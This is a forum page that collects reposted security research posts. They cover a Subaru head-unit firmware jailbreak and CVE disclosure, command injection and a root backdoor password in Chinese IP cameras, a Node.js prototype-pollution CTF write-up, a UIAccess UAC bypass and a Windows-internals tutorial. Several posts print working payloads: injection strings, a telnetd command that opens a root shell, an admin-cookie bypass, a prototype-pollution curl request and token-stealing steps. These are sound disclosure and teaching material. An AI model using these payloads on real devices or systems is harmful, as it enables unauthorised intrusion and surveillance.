.text:08052806 .text:08052806 loc_8052806 ; CODE XREF: sub_805279C+64↑j .text:08052806 SUBS R3, R0, #1 .text:08052808 NEGS R0, R3 .text:0805280A ADCS R0, R3 .text:0805280C MOV R5, R0 .text:0805280E .text:0805280E loc_805280E ; CODE XREF: sub_805279C+54↑j .text:0805280E MOVS R1, #0 ; c .text:08052810 LDR R2, [SP,#0x28+var_24] ; n .text:08052812 MOV R0, R4 ; s .text:08052814 BLX memset .text:08052818 MOV R0, R4 .text:0805281A BL sub_8072DB0 .text:0805281E LDR R3, =__stack_chk_guard .text:08052820 LDR R2, [SP,#0x28+var_1C] .text:08052822 MOV R0, R5 .text:08052824 LDR R3, [R3] .text:08052826 CMP R2, R3 .text:08052828 BEQ loc_805282E .text:0805282A BLX __stack_chk_fail .text:0805282E ; --------------------------------------------------------------------------- .text:0805282E .text:0805282E loc_805282E ; CODE XREF: sub_805279C+8C↑j .text:0805282E ADD SP, SP, #0x14 .text:08052830 POP {R4-R7,PC} R0 is our return value in ARM, and will contain the value of authenticated on subroutine exit. The write to R0 is: .text:08052822 28 46 MOV R0, R5 Change this to return authenticated = 1;, which is going to be this in ASM: .text:08052822 01 20 MOVS R0, #1 Thus, 28 46 -> 01 20. Not the best backdoor possible, but it works. $ ssh root@192.168.0.1 ****************************** SUBARU ******************************* Warning - You are knowingly accessing a secured system. That means you are liable for any mischeif you do. 
********************************************************************* root@192.168.0.1's password: # uname -a QNX localhost 6.6.0 2016/09/07-09:25:33CDT i.MX6S_Subaru_Gen3_ED2_Board armle # cat /etc/shadow root:@S@aaaaaa@56c26c380d39ce15:1042473811:0:0 logger:@S@bbbbbb@607cb4704d35c71b:1420070987:0:0 certifier:@S@cccccc@e0a3f6794d650876:1420137227:0:0 # pidin -F "%n %U %V %W %X %Y %Z" | grep sh usr/sbin/sshd 0 0 0 0 0 0 usr/sbin/sshd 0 0 0 0 0 0 bin/sh 0 0 0 0 0 0 Putting it All Together To root any 2017+ Subaru StarLink head unit, an attacker needs the following to generate valid update images: A Subaru head unit with serial and USB port access. The encryption keys for the update files. An official update. These seem to be available for most platforms in many different ways. Without the official update, the ISO signature check will fail and the install will not continue to the stage where the QNXCNDFS files are written. Physical access to the vehicles USB ports. Technically, the head unit isn't needed, but to replace it you'd need code to generate QNXCNDFS images from QNX6 filesystem images. After we have those pieces: Use the serial and USB ports to gain local code execution on the system. Decondense an official software update QNXCNDFS image. Use the QNX Platform VM Image to modify the QNX6 filesystem. Inject some form of backdoor — sshd in this case. Re-package the update file via cndfs. Replace the modified QNXCNDFS file in the official system update. Install. While this may seem like an execessive number of steps to gain code execution, keep in mind an attacker would only need to do this once and then could conceivably generate valid updates for other platforms. Valid update images were initially challenging to find, but it appears that Subaru is now releasing these via a map-update application that can be used if you have a valid VIN. I will not be releasing modified update files and I wouldn't recommend doing this to your own car. CVE-2018-18203 A vulnerability in the update mechanism of Subaru StarLink head units 2017, 2018, and 2019 may give an attacker (with physical access to the vehicle's USB ports) the ability to rewrite the firmware of the head unit. This vulnerability is due to bugs in the signature checking implementation used when verifying specific update files. An attacker could potentially install persistent malicious head unit firmware and execute arbitrary code as the root user. Next Steps After all of this, I still know very little about the Harman head unit system, but I do know how to root them. Reverse engineering QNXCNDFS wasn't required, but was an interesting avenue to explore and may help other researchers in the future. The next step is far less tedious than reversing filesystem containers — explore the system, see what hidden functionality exists (Andromeda is probably a goldmine, map out dbus), setup a cross-compiler, and so on. Notes from Subaru and Harman Both Subaru and Harman wanted to relay messages about the flaw in this write-up. I have paraphrased them below. If you have questions, please contact either Subaru or Harman directly. Note from Subaru Subaru will have updates for head units affected by this flaw in the coming weeks. Note from Harman The firmware update process attempted to verify the authenticity of the QNXCNDFS dat files. The procedure in question had a bug in it that caused unsigned images to verify as "valid", which allowed for unsigned code installation. 
Conclusion
I started this in my free time in July of 2018 and finished early the next month. Overall, the process took less than 100 hours. The embargo was originally scheduled for 90 days, which would have been November 5th, 2018. Subaru requested more time before the original embargo ended and I agreed to extend it until the end of November. I was unable to find any sort of responsible/coordinated disclosure form on Harman or Subaru's websites. That was disappointing as Harman seems to have plenty of sales pages detailing their security programs and systems. I did manage to find a Harman security engineer on LinkedIn who did an excellent job handling the incident. Thank you! Harman and Subaru should not conclude that the biggest flaw here was releasing update files. Letting customers update their own head units is wonderful, and it lets security researchers find flaws and report them. Giving the updates exclusively to dealers prevents the good guys from finding bugs. Nation states and organized crime would certainly not have trouble gaining access to firmware and software updates. If anyone affiliated with education or some other useful endeavor would like the head unit, I'll be happy to ship it assuming you pay the shipping costs and agree to never install this in a vehicle. Thank you to those I worked with at Harman, especially Josiah Bruner, and to Subaru for making a great car. Questions, comments, complaints? github.scott@gmail.com Sursa: https://github.com/sgayou/subaru-starlink-research/blob/master/doc/README.md#jailbreaking-subaru-starlink
    1 point
  9. Maurits van Altvorst Achieving remote code execution on a Chinese IP camera February 14, 2019 Background Cheap Chinese Internet of Things devices are on the rise. Unfortunately, security on these devices is often an afterthought. I recently got my hands on an “Alecto DVC-155IP” IP camera. It has Wi-Fi, night vision, two-axis tilt and yaw control, motion sensing and more. My expectations regarding security were low, but this camera was still able to surprise me. Setting up the camera Setting up the camera using the app was a breeze. I had to enter my Wi-Fi details, a name for the camera and a password. Nothing too interesting so far. Using Nmap on the camera gave me the following results: ➜ ~ nmap -A 192.168.178.59 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-09 12:59 CET Nmap scan report for 192.168.178.59 Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet BusyBox telnetd 80/tcp open http thttpd 2.25b 29dec2003 |_http-server-header: thttpd/2.25b 29dec2003 |_http-title: Site doesn't have a title (text/html; charset=utf-8). 554/tcp open rtsp HiLinux IP camera rtspd V100R003 (VodServer 1.0.0) |_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY Service Info: Host: RT-IPC; Device: webcam Three open ports: 23, 80 and 554. Surprisingly, port 23 doesn’t get mentioned anywhere in the manual. Is this some debug port from the manufacturer, or a backdoor from the Chinese government? After manually testing a few passwords via telnet I moved on. When I connected to the admin panel - accessible on port 80 - I was greeted with a standard login screen that prompts the user for a username and password. The first step I took was opening the Chrome developer tab. This allows you to inspect the network requests that Chrome made while visiting a website. I saw that there were a lot of requests being made for a simple login page. My eye quickly fell on a specific request: /cgi-bin/hi3510/snap.cgi?&-getstream&-chn=2 Hmm, “getstream”, I wonder what happens if I open this in another tab… Within 2 minutes I’ve gained unauthenticated access to the live view of the camera. I knew that cheap Chinese cameras weren’t secure, but I didn’t expect it was this bad. Other observations While looking through the network requests, I noticed some more notable endpoints: You are able to get the Wi-Fi SSID, BSSID, and password from the network the camera is connected to by visiting /cgi-bin/getwifiattr.cgi. This allows you to retrieve the location of the camera via a service such as wigle.net. You are able to set the camera’s internal time via /cgi-bin/hi3510/setservertime.cgi?-time=YYYY.MM.DD.HH.MM.SS&-utc. I’m not sure if this opens up any attack vectors, but it’s interesting nonetheless. It might be possible to do some interesting things by sending invalid times or big strings, but I don’t want to risk bricking my camera testing this. You are able to get the camera’s password via /cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get. Of course, you don’t even need the password to log in. Just set the “AuthLevel” cookie to 255 and you instantly get admin access. You are able to get the serial number, hardware revision, uptime, and storage info via /web/cgi-bin/hi3510/param.cgi?cmd=getserverinfo All of these requests are unauthenticated. Remote code execution Let’s take another look at the requests made on the login page. You can see a lot of “.cgi” requests. CGI-files are “Common Gateway Interface” files. 
They are executable scripts used in web servers to dynamically create web pages. Because they're often based on bash scripts, I started focusing on these requests first because I thought I might find an endpoint susceptible to bash code injection. To find out if a .cgi endpoint was vulnerable, I tried substituting some request parameters with $(sleep 3). When I tried /cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=$(sleep 3), it took a suspiciously long time before I got back my response. To confirm that I can execute bash code, I opened Wireshark on my laptop and sent the following payload to the camera: $(ping -c2 192.168.178.243) And sure enough, I saw two ICMP requests appear on my laptop. But surely, nobody in their right mind would connect such a cheap, insecure IP camera directly to the internet, right? A quick Shodan search for this model says otherwise: that's 710 Alecto DVC-155IP cameras connected to the internet that disclose their Wi-Fi details (which means that I can figure out their location by using a service such as wigle.net), allow anyone to view their live stream, and are vulnerable to RCE. And this is just the DVC-155IP model; Alecto manufactures many different IP cameras, each running the same software. Returning to port 23 Now that I'm able to run commands, it's time to return to the mysterious port 23. Unfortunately, I'm not able to get any output from the commands I execute. Using netcat to send the output of the commands I executed also didn't work for some reason. After spending way too much time without progress, this was the command that did the trick: telnetd -l/bin/sh -p9999 This starts a telnet server on port 9999. And sure enough, after connecting to it I was greeted with an unauthenticated root shell. Reading /etc/passwd gave me the following output: root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh I didn't even have to start Hashcat for this one: a quick Google search of the hash was all I needed to find that the password of the mysterious backdoor port was cat1029. Yes, the password to probably thousands of IP cameras on the internet is cat1029. And the worst part is that there's no possible way to change this password anywhere in the typical user interface. Contacting the manufacturer When I contacted Alecto with my findings, they told me they weren't able to solve these problems because they didn't create the software for their devices. After a quick Shodan search I found that there were also internet connected cameras from other brands, such as Foscam and DIGITUS, that had these vulnerabilities. Their user interfaces look different, but they were susceptible to the same exact vulnerabilities via the same exact endpoints. It seems that these IP cameras are manufactured by a Chinese company in bulk (OEM). Other companies, like Alecto, Foscam, and DIGITUS, resell them with slightly modified firmware and custom branding. A vulnerability in the Chinese manufacturer's software means that all of its child companies are vulnerable too. Unfortunately, I don't think that the Chinese OEM manufacturer will do much about these vulnerabilities. I guess that the phrase "The S in IoT stands for security" is true after all. Author | Maurits van Altvorst I'm 16 years old and a student from Gemeentelijk Gymnasium Hilversum. You can find my Github here and my Linkedin here Sursa: https://www.mauritsvanaltvorst.com/rce-chinese-ip-cameras/
    1 point
  10. Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup Feb 15, 2019 • ctf Prototype Pollution attacks on NodeJs is a recent research by Olivier Arteau where he discovered how to exploit an application if we can pollute the prototype of a base object. Introduction Objects in javaScript Functions/Classes in javaScript? WTH is a constructor ? Prototypes in javaScript Prototype Pollution Merge() - Why was it vulnerable? References Introduction Prototype Pollution attacks, as the name suggests, is about polluting the prototype of a base object which can sometimes lead to RCE. This is a fantastic research done by Olivier Arteau and has given a talk on NorthSec 2018. Let’s take a look at the vulnerability in-depth with an example from Nullcon HackIm 2019 challenge named proton: Objects in javaScript An object in the javaScript is nothing but a collection of key value pairs where each pair is known as a property. Let’s take an example to illustrate (you can use the browser console to execute and try it yourself): var obj = { "name": "0daylabs", "website": "blog.0daylabs.com" } obj.name; // prints "0daylabs" obj.website; // prints "blog.0daylabs.com" console.log(obj); // prints the entire object along with all of its properties. In the above example, name and website are the properties of the object obj. If you carefully look at the last statement, the console.log prints out a lot more information than the properties we explicitly defined. Where are these properties coming from ? Object is the fundamental basic object upon which all other objects are created. We can create an empty object (without any properties) by passing the argument null during object creation, but by default it creates an object of a type that corresponds to its value and inherits all the properties to the newly created object (unless its null). console.log(Object.create(null)); // prints an empty object Functions/Classes in javaScript? In javaScript, the concept of classes and functions are relative (functions itself serves as the constructor for the class and there is no explicit “classes” itself). Let’s take an example: function person(fullName, age) { this.age = age; this.fullName = fullName; this.details = function() { return this.fullName + " has age: " + this.age; } } console.log(person.prototype); // prints the prototype property of the function /* {constructor: ƒ} constructor: ƒ person(fullName, age) __proto__: Object */ var person1 = new person("Anirudh", 25); var person2 = new person("Anand", 45); console.log(person1); /* person {age: 25, fullName: "Anirudh"} age: 45 fullName: "Anand" __proto__: constructor: ƒ person(fullName, age) arguments: null caller: null length: 2 name: "person" prototype: {constructor: ƒ} __proto__: ƒ () [[FunctionLocation]]: VM134:1 [[Scopes]]: Scopes[1] __proto__: Object */ console.log(person2); /* person {age: 45, fullName: "Anand"} age: 45 fullName: "Anand" __proto__: constructor: ƒ person(fullName, age) arguments: null caller: null length: 2 name: "person" prototype: {constructor: ƒ} __proto__: ƒ () [[FunctionLocation]]: VM134:1 [[Scopes]]: Scopes[1] __proto__: Object */ person1.details(); // prints "Anirudh has age: 25" In the above example, we defined a function named person and we created 2 objects named person1 and person2. If we take a look at the properties of the newly created function and objects, we can note 2 things: When a function is created, JavaScript engine includes a prototype property to the function. 
This prototype property is an object (called as prototype object) and has a constructor property by default which points back to the function on which prototype object is a property. When an object is created, JavaScript engine adds a __proto__ property to the newly created object which points to the prototype object of the constructor function. In short, object.__proto__ is pointing to function.prototype. WTH is a constructor ? Constructor is a magical property which returns the function that used to create the object. The prototype object has a constructor which points to the function itself and the constructor of the constructor is the global function constructor. var person3 = new person("test", 55); person3.constructor; // prints the function "person" itself person3.constructor.constructor; // prints ƒ Function() { [native code] } <- Global Function constructor person3.constructor.constructor("return 1"); /* ƒ anonymous( ) { return 1 } */ // Finally call the function person3.constructor.constructor("return 1")(); // returns 1 Prototypes in javaScript One of the things to note here is that the prototype property can be modified at run time to add/delete/edit entries. For example: function person(fullName, age) { this.age = age; this.fullName = fullName; } var person1 = new person("Anirudh", 25); person.prototype.details = function() { return this.fullName + " has age: " + this.age; } console.log(person1.details()); // prints "Anirudh has age: 25" What we did above is that we modified the function’s prototype to add a new property. The same result can be achieved using objects: function person(fullName, age) { this.age = age; this.fullName = fullName; } var person1 = new person("Anirudh", 25); var person2 = new person("Anand", 45); // Using person1 object person1.constructor.prototype.details = function() { return this.fullName + " has age: " + this.age; } console.log(person1.details()); // prints "Anirudh has age: 25" console.log(person2.details()); // prints "Anand has age: 45" :O Noticied anything suspicious? We modified person1 object but why person2 also got affected? The reason being that in the first example, we directly modified person.prototype to add a new property but in the 2nd example we did exactly the same but by using object. We have already seen that constructor returns the function using which the object is created so person1.constructor points to the function person itself and person1.constructor.prototype is the same as person.prototype. Prototype Pollution Let’s take an example, obj[a] = value. If an attacker can control a and value, then he can set the value of a to __proto__ and the property b will be defined for all existing objects of the application with the value value. The attack is not as simple as it feels like from the above statement. According to the research paper, this is exploitable only if any of the following 3 happens: Object recursive merge Property definition by path Object clone Let’s take the Nullcon HackIM challenge to see a practical scenario. 
The challenge starts with iterating a MongoDB id (which was trivial to do) and we get access to the below source code: 'use strict'; const express = require('express'); const bodyParser = require('body-parser') const cookieParser = require('cookie-parser'); const path = require('path'); const isObject = obj => obj && obj.constructor && obj.constructor === Object; function merge(a, b) { for (var attr in b) { if (isObject(a[attr]) && isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr] = b[attr]; } } return a } function clone(a) { return merge({}, a); } // Constants const PORT = 8080; const HOST = '0.0.0.0'; const admin = {}; // App const app = express(); app.use(bodyParser.json()) app.use(cookieParser()); app.use('/', express.static(path.join(__dirname, 'views'))); app.post('/signup', (req, res) => { var body = JSON.parse(JSON.stringify(req.body)); var copybody = clone(body) if (copybody.name) { res.cookie('name', copybody.name).json({ "done": "cookie set" }); } else { res.json({ "error": "cookie not set" }) } }); app.get('/getFlag', (req, res) => { var аdmin = JSON.parse(JSON.stringify(req.cookies)) if (admin.аdmin == 1) { res.send("hackim19{}"); } else { res.send("You are not authorized"); } }); app.listen(PORT, HOST); console.log(`Running on http://${HOST}:${PORT}`); The code starts with defining a function merge which is essentially an insecure design of merging 2 objects. Since the latest version of libraries that does the merge() has already been patched, the challenge delibrately used the old method in which merge used to happen to make it vulnerable. One thing we can quickly notice in the above code is the definition of 2 “admins” as const admin and var аdmin. Ideally javaScript doesn’t allow to define a const variable again as var so this has to be different. It took a good amount of time to figure out that one of them has a normal a while the other has some other a (homograph). So instead of wasting time over it, I renamed it to normal a itself and worked on the challenge so that once solved, we can send the payload accordingly. So from the challenge source code, here are the following observations: Merge() function is written in a way that prototype pollution can happen (more analysis of the same later in the article). So that’s indeed the way to solve the problem. The vulnerable function is actually called while hitting /signup via clone(body) so we can send our JSON payload while signing up which can add the admin property and immediately call /getFlag to get the flag. As discussed above, we can use __proto__ (points to constructor.prototype) to create the admin property with value 1. The simplest payload to do the same: {"__proto__": {"admin": 1}} So the final payload to solve the problem (using curl since I was not able to send homograph via burp): curl -vv --header 'Content-type: application/json' -d '{"__proto__": {"admin": 1}}' 'http://0.0.0.0:4000/signup'; curl -vv 'http://0.0.0.0:4000/getFlag' Merge() - Why was it vulnerable? One obvious question here is, what makes the merge() function vulnerable here? Here is how it works and what makes it vulnerable: The function starts with iterating all properties that is present on the 2nd object b (since 2nd is given preference incase of same key-value pairs). If the property exists on both first and second arguments and they are both of type Object, then it recusively starts to merge it. 
Now if we can control the value of b[attr] to make attr as __proto__ and also if we can control the value inside the proto property in b, then while recursion, a[attr] at some point will actually point to prototype of the object a and we can successfully add a new property to all the objects. Still confused ? Well I don’t blame, because it took sometime for me also to understand the concept. Let’s write some debug statements to figure out what is happening. const isObject = obj => obj && obj.constructor && obj.constructor === Object; function merge(a, b) { console.log(b); // prints { __proto__: { admin: 1 } } for (var attr in b) { console.log("Current attribute: " + attr); // prints Current attribute: __proto__ if (isObject(a[attr]) && isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr] = b[attr]; } } return a } function clone(a) { return merge({}, a); } Now let’s try sending the curl request mentioned above. What we can notice is that the object b now has the value: { __proto__: { admin: 1 } } where __proto__ is just a property name and is not actually pointing to function prototype. Now during the function merge(), for (var attr in b) iterates through every attribute where the first attribute name now is __proto__. Since it’s always of type object, it starts to recursively call, this time as merge(a[__proto__], b[__proto__]). This essentially helped us in getting access to function prototype of a and add new properties which is defined in the proto property of b. References Olivier Arteau – Prototype pollution attacks in NodeJS applications Prototypes in javaScript MDN Web Docs - Object Anirudh Anand Security Engineer @flipkart | Web Application Security ♥ | Google, Microsoft, Zendesk, Gitlab Hall of Fames | Blogger | CTF lover - @teambi0s | certs - eWDP, OSCP Sursa: https://blog.0daylabs.com/2019/02/15/prototype-pollution-javascript/
    1 point
  11. Trends, Challenges, and Strategic Shifts in the Software Vulnerability Mitigation Landscape The software vulnerability landscape has changed dramatically over the past 20+ years. During this period, we’ve gone from easy-to-exploit stack buffer overruns to complex-and-expensive chains of multiple exploits. To better understand this evolution, this presentation will describe the vulnerability mitigation strategy Microsoft has been pursuing and will show how this strategy has influenced vulnerability and exploitation trends over time. This retrospective will form the basis for discussing some of the vulnerability mitigation challenges that exist today and the strategic shifts that Microsoft is exploring to address those challenges.
    1 point
  12. Thursday, 14 February 2019 Accessing Access Tokens for UIAccess I mentioned in a previous blog post (link) Windows RS5 finally kills the abuse of Access Tokens, as far as I can tell, to elevate to admin by just opening the access token. This is a shame, but personally I didn't care. However, I was contacted on Twitter about some UAC related things, specifically getting UIAccess. I was surprised that people have not been curious enough to put two and two together and realize that the previous token stealing bug can still be used to get you UIAccess even if the direct path to admin has been blocked. This blog post gives a bit of information on why you might care about UIAccess and how you can get your own code running as UIAccess. TL;DR; you can do the same token stealing trick with UIAccess processes, which doesn't require an elevation prompt, then automate the UI of a privileged process to get a UAC bypass. An example PowerShell script which does this is on my github. First, what is UIAccess? One of the related features of UAC was User Interface Privilege Isolation (UIPI). UIPI limits the ability of a process interacting with the windows of a higher integrity level process, preventing a malicious application automating a privileged UI to elevate privileges. There's of course some holes which have been discovered over the years but the fundamental principle is sound. However there's a big problem, what about Assistive Technologies? Many people rely on on-screen keyboards, screen readers and the like, they won't work if you can't read and automate the privileged UI. If you're blind does that mean you can't be an administrator? The design Microsoft went with was for a backdoor to UIPI and added a special flag to Access Tokens called UIAccess. When this flag is set most of the UIPI features of WIN32K are relaxed. From an escalation perspective if you have UIAccess you can automate the windows of a higher integrity process, say an administrator command prompt and use that access to bypass, further, UAC prompts. You can set the UIAccess flag on a token by calling SetTokenInformation and pass the TokenUIAccess information class. If you do that you'll find that you can't set the flag as a normal user, you need SeTcbPrivilege which is typically only granted to SYSTEM. If you need a "God" privilege to set the flag how does UIAccess get set in normal operation? You need to get the AppInfo service to spawn your process with an appropriate set of flags or just call ShellExecute. As the service runs as SYSTEM with SeTcbPrivilege is can set the UIAccess flag on start up. While the Consent application will spawn for UIAccess no UAC prompt will show (otherwise what's the point?). The AppInfo service spawns admin UAC processes, however by setting the uiAccess attribute in your manifest to true it'll instead spawn your process as UIAccess. However, it's not that simple, as per this link you also need sign the executable (easy as it can be self-signed) but also the executable must be in a secure location such as System32 or Program Files (harder). To prevent a malicious application spawning a UIAccess process, then injecting code into it, the AppInfo service tweaks the integrity of the token to be High (for split-token admin) or the current integrity plus 16 for normal users. This elevated integrity blocks read/write access to the new process. Of course there are bugs, for example I found one in 2014, since fixed, in the secure location check by abusing directory NTFS named streams. 
UACME also has an exploit which abuses UIAccess (method 32, based on this blog post) if you can find a writable secure location directory or abuse the existing IFileOperation tricks to write a file into the appropriate location. However, for those keeping score the UIAccess is a property of the access token. As the OS doesn't do anything special to clear it you can open the token from an existing UIAccess process, take it's token and create a new process with that token and start automating the heck out of privileged windows 😉 In summary here's how to exploit this behavior on a completely default install of Windows 10 RS5 and below. Find or start a UIAccess process, such as the on-screen keyboard (OSK.EXE). As AppInfo doesn't prompt for UIAccess this can be done, relatively, silently. Open the process for PROCESS_QUERY_LIMITED_INFORMATION access. This is allowed as long as you have any access to the process. This could even be done from a Low integrity process (but not from an AC) although on Windows 10 RS5 some other sandbox mitigations get in the way in the next step, but it should work on Windows 7. Open the process token for TOKEN_DUPLICATE access and duplicate the token to a new writable primary token. Set the new token's integrity to match your current token's integrity. Use the token in CreateProcessAsUser to spawn a new process with the UIAccess flag. Automate the UI to your heart's desire. Based on my original blogs you might wonder how I can create a new process with the token when previously I could only impersonate? For UIAccess the AppInfo service just modifies a copy of the caller's token rather than using the linked token. This means the UIAccess token is considered a sibling of any other process on the desktop and so is permitted to assign the primary token as long as the integrity is dropped to be equal or lower than the current integrity. As an example I've uploaded a PowerShell script which does the attack and uses the SendKeys class to write an arbitrary command to a focused elevated command prompt on the desktop (how you get the command prompt is out of scope). There's almost certainly other tricks you can do once you've got UIAccess. For example if the administrator has set the "User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop" group policy then it's possible to disable the secure desktop from a UIAccess process and automate the elevation prompt itself. In conclusion, while the old admin token stealing trick went away it doesn't mean it doesn't still have value. By abusing UIAccess programs we can almost certainly bypass UAC. Of course as it's not a security boundary and is so full of holes I'm not sure anyone cares about it Posted by tiraniddo at 15:42 Sursa: https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html
    1 point
13. Reverse Engineering Malware, Part 4: Windows Internals July 4, 2017
Welcome back to my Reverse Engineering Malware series. In general, reverse engineering of malware is done on Windows systems. That's because despite recent inroads by Linux and the Mac OS, Windows systems still comprise over 90% of all computing systems in the world. As such, well over 90% of malware is designed to compromise Windows systems. For this reason, it makes sense to focus our attention on Windows operating systems. When reversing malware, the operating system plays a key role. All applications interact with the operating system and are tightly integrated with the OS. We can gather a significant amount of information on the malware by probing the interface between the OS and the application (malware). To understand how malware can use and manipulate Windows, then, we need to better understand the inner workings of the Windows operating system. In this article, we will examine the inner workings of Windows 32-bit systems so that we can better understand how malware can use the operating system for its malicious purposes. Windows internals could fill several textbooks (and have), so I will attempt to cover only the most important topics, and only in a cursory way. I hope to leave you with enough information, though, that you can effectively reverse the malware in the following articles.

Virtual Memory
Virtual memory is the idea that instead of software directly accessing the physical memory, the CPU and the operating system create an invisible layer between the software and the physical memory. The OS creates a table that the CPU consults, called the page table, that directs the process to the location of the physical memory that it should use.

Processors divide memory into pages. Pages are fixed-size chunks of memory. Each entry in the page table references one page of memory. In general, 32-bit processors use 4k-sized pages, with some exceptions.

Kernel vs. User Mode
Having a page table enables the processor to enforce rules on how memory will be accessed. For instance, page table entries often have flags that determine whether the page can be accessed from a non-privileged mode (user mode). In this way, the operating system's code can reside inside the process's address space without concern that it will be accessed by non-privileged processes. This protects the operating system's sensitive data. This distinction between privileged and non-privileged execution is what we call kernel (privileged) mode and user (non-privileged) mode.

Kernel Memory Space
The kernel reserves 2GB of address space for itself. This address space contains all the kernel code, including the kernel itself and any other kernel components such as device drivers.

Paging
Paging is the process where memory regions are temporarily flushed to the hard drive when they have not been used recently. The processor tracks the time since a page of memory was last used, and the oldest is flushed. Obviously, physical memory is faster and more expensive than space on the hard drive. The Windows operating system tracks when a page was last accessed and then uses that information to locate pages that haven't been accessed in a while. Windows then flushes their content to a file. The contents of the flushed pages can then be discarded and the space used by other information. When the operating system needs to access these flushed pages, a page fault is generated and the system sees that the information has been "paged out" to a file.
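As a quick aside, here is a small illustrative C sketch (my own addition, not part of the original article) of how a classic non-PAE 32-bit x86 processor splits a virtual address during the page-table lookup described above: a 10-bit page-directory index, a 10-bit page-table index, and a 12-bit offset into a 4k page. The address value is just an arbitrary example.

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint32_t va = 0x7FFDE123u;                /* arbitrary example user-mode address */
    uint32_t pde_index = (va >> 22) & 0x3FF;  /* top 10 bits select the page-directory entry */
    uint32_t pte_index = (va >> 12) & 0x3FF;  /* next 10 bits select the page-table entry */
    uint32_t offset    = va & 0xFFF;          /* low 12 bits are the offset inside the 4k page */

    printf("VA 0x%08X -> PDE %u, PTE %u, offset 0x%03X\n",
           va, pde_index, pte_index, offset);
    return 0;
}

The page-table entry located this way holds the physical page address plus the flags (such as the user/supervisor bit) that enforce the kernel/user split described above.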
When such a page fault occurs, the operating system accesses the page file and pulls the information back into memory to be used.

Objects and Handles
The Windows kernel manages objects using a centralized object manager component. This object manager is responsible for all kernel objects such as sections, files, and device objects, synchronization objects, processes, and threads. It ONLY manages kernel objects. GUI-related objects are managed by separate object managers that are implemented inside WIN32K.SYS. Kernel code typically accesses objects using direct pointers to the object data structures. Applications use handles for accessing individual objects.

Handles
A handle is a process-specific numeric identifier which is an index into the process's private handle table. Each entry in the handle table contains a pointer to the underlying object, which is how the system associates handles with objects. Each handle entry also contains an access mask that determines which types of operations can be performed on the object using this specific handle.

Processes
A process is really just an isolated memory address space that is used to run a program. Address spaces are created for every program to make sure that each program runs in its own address space without colliding with other processes. Inside a process's address space the system can load code modules, but it must have at least one thread running to do so.

Process Initialization
The creation of the process object and the new address space is the first step. When a new process calls the Win32 API CreateProcess, the API creates a process object and allocates a new memory address space for the process. CreateProcess maps NTDLL.DLL and the program executable (the .exe file) into the newly created address space. CreateProcess creates the process's first thread and allocates stack space for it. The process's first thread is resumed and starts running in the LdrpInitialization function inside NTDLL.DLL. LdrpInitialization recursively traverses the primary executable's import tables and maps into memory every executable that is required. At this point, control passes into LdrpRunInitializeRoutines, which is an internal NTDLL routine responsible for initializing all statically linked DLLs currently loaded into the address space. The initialization process consists of calling each DLL's entry point with the DLL_PROCESS_ATTACH constant. Once all the DLLs are initialized, LdrpInitialize calls the thread's real initialization routine, which is the BaseProcessStart function from KERNEL32.DLL. This function in turn calls the executable's WinMain entry point, at which point the process has completed its initialization sequence.

Threads
At any given moment, each processor in the system is running one thread. Instead of continuing to run a single piece of code until it completes, Windows can decide to interrupt a running thread at any given time and switch to execution of another thread. A thread is represented by a data structure that includes a CONTEXT data structure. The CONTEXT holds the state of the processor when the thread last ran, along with one or two memory blocks that are used for stack space; that stack space is also used to save off the current state of the thread when it is context-switched. The components that manage threads in Windows are the scheduler and the dispatcher: they decide which thread gets to run and for how long, and they perform the context switch.

Context Switch
A context switch is the interruption of a running thread so that another thread can run.
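To make the CONTEXT idea a bit more tangible, here is a small illustrative C sketch (my own addition, not from the original article) that reads another thread's saved register state from user mode with documented Win32 APIs; this is essentially the same per-thread state the dispatcher saves and restores on every context switch. The thread ID parameter is a placeholder, and the Eip/Esp fields assume a 32-bit build, matching this article's 32-bit focus.

#include <windows.h>
#include <stdio.h>

/* Illustrative sketch: dump the saved instruction and stack pointers of a
   thread in the current process. thread_id is hypothetical; a real tool
   would enumerate threads first. */
void dump_thread_context(DWORD thread_id)
{
    HANDLE thread = OpenThread(THREAD_GET_CONTEXT | THREAD_SUSPEND_RESUME,
                               FALSE, thread_id);
    if (thread == NULL)
        return;

    CONTEXT ctx;
    ctx.ContextFlags = CONTEXT_CONTROL;   /* request only the control registers */

    SuspendThread(thread);                /* the context is stable only while suspended */
    if (GetThreadContext(thread, &ctx))
        printf("Eip = 0x%08lX, Esp = 0x%08lX\n", ctx.Eip, ctx.Esp);
    ResumeThread(thread);

    CloseHandle(thread);
}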
In some cases, threads just give up the CPU on their own and the kernel doesn't have to interrupt them. Every thread is assigned a quantum, which determines how long the thread can run without interruption. Once the quantum expires, the thread is interrupted and other threads are allowed to run. This entire process is transparent to the thread. The kernel stores the state of the CPU registers before suspending the thread and restores that register state when the thread is resumed.

Win32 API
An API is a set of functions that the operating system makes available to application programs for communicating with the OS. The Win32 API is a large set of functions that make up the official low-level programming interface for Windows applications. The MFC is a common interface to the Win32 API. The three main components of the Win32 API are:
(1) Kernel or Base APIs: the non-GUI-related services such as I/O, memory, object, process, and thread management.
(2) GDI APIs: low-level graphics services such as those for drawing a line, displaying a bitmap, etc.
(3) USER APIs: higher-level GUI-related services such as window management, menus, dialog boxes, and user-interface controls.

System Calls
A system call happens when user-mode code needs to call a kernel-mode function. This usually happens when an application calls an operating system API. User-mode code invokes a special CPU instruction that tells the processor to switch to its privileged mode and call a dispatch routine. This dispatch routine then calls the specific system function requested from user mode.

PE Format
The Windows executable format is PE (Portable Executable). The term "portable" refers to the format's versatility in numerous environments and architectures. Executable files are relocatable. This means that they could be loaded at a different virtual address each time they are loaded. An executable must coexist with other executables that are loaded in the same address space. Other than the main executable, every program has a certain number of additional executables loaded into its address space, regardless of whether it has DLLs of its own or not.

Relocation Issues
